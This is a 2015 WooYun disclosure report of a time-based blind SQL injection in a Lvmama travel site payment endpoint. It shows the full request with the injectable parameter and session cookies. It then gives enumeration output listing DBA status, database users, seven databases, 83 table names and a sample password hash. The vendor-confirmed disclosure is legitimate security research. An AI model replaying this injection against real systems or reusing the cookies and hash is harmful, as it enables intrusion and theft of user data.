当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142911

漏洞标题:驴妈妈旅游网主站SQL注入漏洞(DBA权限/时间盲注/涉及7个数据库)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-09-23 09:13

修复时间:2015-11-07 10:26

公开时间:2015-11-07 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-10-03: 细节向核心白帽子及相关领域专家公开
2015-10-13: 细节向普通白帽子公开
2015-10-23: 细节向实习白帽子公开
2015-11-07: 细节向公众公开

简要描述:

RT

详细说明:

测试:

GGET /payment/pay/geexOrder.do?callback=success_jsonp&TYPE=FRONT&APP_NAME=aaaaa&APP_START_DATE=&APP_END_DATE=&LOAN_DOWNPAY_MIN=&LOAN_DOWNPAY_MAX=&OPPT_ID=&_=1442927451066 HTTP/1.1
Host: pay.lvmama.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Referer: http://www.lvmama.com/myspace/geex.do
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKcFYBSTRiIi28AzMnAg==; lvsessionid=44abc08b-7275-498e-9ee7-395443b33064_15667285; CoreID6=37603654693514429248595&ci=90409730; vst_ebk_sessionid=f944f244-943d-49b5-a32f-e45f12ce0d3b; oUC=018115018115; oUT=08220822; CASTGC=TGC-56-fhisgT9f9AWdSkT5JywoNnSDyg1j8l60yQx3WL8TH0adoJ4YJe; unUserName=testaaaa; LSTA=781daaa8220ab30cd9fd0fd85ed6ae7b; EMV=U; UN=testaaaa%5E%21%5E4028b25b4fd5ada2014fdae694f60395; Hm_lvt_006c64491cb8acf2092ce0e0341797fe=1442926142; Hm_lpvt_006c64491cb8acf2092ce0e0341797fe=1442926142; _gscu_1059159971=42924981jf5s2210; _gscs_1059159971=42924981y2x3v110|pv:3; _gscbrs_1059159971=1; __xsptplus443=443.2.1442926066.1442926146.4%232%7Cwww.baidu.com%7C%7C%7C%7C%23%23jYwMqOfqxQhhqc_tXZ1w0zJmyc3najX9%23; __utma=30114658.550250882.1442926147.1442926147.1442926147.1; __utmb=30114658.31.10.1442926147; __utmc=30114658; __utmz=30114658.1442926147.1.1.utmcsr=login.lvmama.com|utmccn=(referral)|utmcmd=referral|utmcct=/nsso/null; bfd_s=30114658.38702051.1442924859756; tmc=43.30114658.99931619.1442924859758.1442927429127.1442927444549; tma=30114658.99931619.1442924859758.1442924859758.1442924859758.1; tmd=43.30114658.99931619.1442924859758.; bfd_g=b56c782bcb75035d0000354b00082c1e56014936; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442924860,1442924981,1442926072; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1442927446; 90409730_clogin=v=1&l=1442924859&e=1442929248795


4.jpg


权限:

current user is DBA:    True


用户:

database management system users [4]:
[*] 'gravity'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'


数据库:

available databases [7]:
[*] fast_log
[*] geex
[*] gravity
[*] gravity_pre
[*] information_schema
[*] mysql
[*] performance_schema

漏洞证明:

gravity:

[83 tables]
+------------------------+
| BIZ_APP01              |
| BIZ_APP01_FULL         |
| BIZ_APP_CHECKLIST      |
| BIZ_APP_COMMENTS       |
| BIZ_APP_COMMON         |
| BIZ_APP_COMMON_FULL    |
| BIZ_APP_LOG            |
| BIZ_APP_OPPT           |
| BIZ_APP_ORDER          |
| BIZ_APP_RECON_DTL      |
| BIZ_APP_RECON_SUM      |
| BIZ_APP_REJECT         |
| BIZ_APP_STATUS         |
| BIZ_APP_TRACK          |
| BIZ_CAMPAIGN           |
| BIZ_CANTACT_INFO       |
| BIZ_DEVICE             |
| BIZ_DFC_CONFIG         |
| BIZ_FUNDER             |
| BIZ_HAR_MERCHANT       |
| BIZ_HAR_PDT            |
| BIZ_HAR_REFUNDBANK     |
| BIZ_HAR_REPAY          |
| BIZ_HAR_REPAY2PDT      |
| BIZ_HAR_REPAYPLAN      |
| BIZ_HAR_SALES          |
| BIZ_HAR_STORE          |
| BIZ_HAR_STORE2PDT      |
| BIZ_LOAN_PDT           |
| BIZ_LOAN_PLAN          |
| BIZ_MERCHANT           |
| BIZ_PDT_SORT           |
| BIZ_PREPAYMENT         |
| BIZ_PREPAYMENT_ITEM    |
| BIZ_RESOUCES           |
| BIZ_RETAILS_PDT        |
| BIZ_SHD_LIST           |
| BIZ_STORE_ORGNZ        |
| BIZ_TAGGING            |
| BIZ_TAGS               |
| BIZ_TRANSACTION_RECORD |
| BIZ_UNIPAY_RECORD      |
| BIZ_V_APP_APL          |
| BIZ_V_APP_BCF          |
| BIZ_V_APP_BCF02        |
| BIZ_V_APP_BCF03        |
| BIZ_V_APP_BOC          |
| BIZ_V_APP_BYR          |
| BIZ_V_APP_GFC          |
| BIZ_V_APP_HAR          |
| BIZ_V_APP_QKE          |
| CRM_ACTION_LOG         |
| CRM_CONFIG             |
| CRM_CONVERT            |
| CRM_CRON_SCHEDULE      |
| CRM_DICT               |
| CRM_DICT2              |
| CRM_EMAIL_MGR          |
| CRM_EMAIL_RAW          |
| CRM_EMAIL_RAW_FULL     |
| CRM_EMAIL_SENT         |
| CRM_EMAIL_WORK         |
| CRM_GAME_KV            |
| CRM_RELATION           |
| CRM_SMS_MGR            |
| CRM_UNIQUEID_MGR       |
| CRM_UPDOWN_MGR         |
| CRM_USER_INFO_WECHAT   |
| FRAUD_FACEPP_DETECTION |
| FRAUD_FACEPP_SIMSCORE  |
| FRAUD_INSTINCT_INFO    |
| FRAUD_INSTINCT_OUT     |
| accounts               |
| ci_sessions            |
| dx_login_attempts      |
| dx_permissions         |
| dx_roles               |
| dx_user_autologin      |
| dx_user_profile        |
| dx_user_temp           |
| dx_users               |
| migrations             |
| pd_message             |
+------------------------+


dx_users里都是用户的数据 密码是做了加密 类似这样 $1$.49TxKWL$0stw8KLcghDgaaASJrVHv1
但是其他信息还是可以被爆破出来的 由于是时间盲注 就不继续了

修复方案:

:-) 驴妈妈是个好厂商 如果我挖的足够多,它的礼物就会追上我

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-23 10:24

厂商回复:

谢谢!

最新状态:

暂无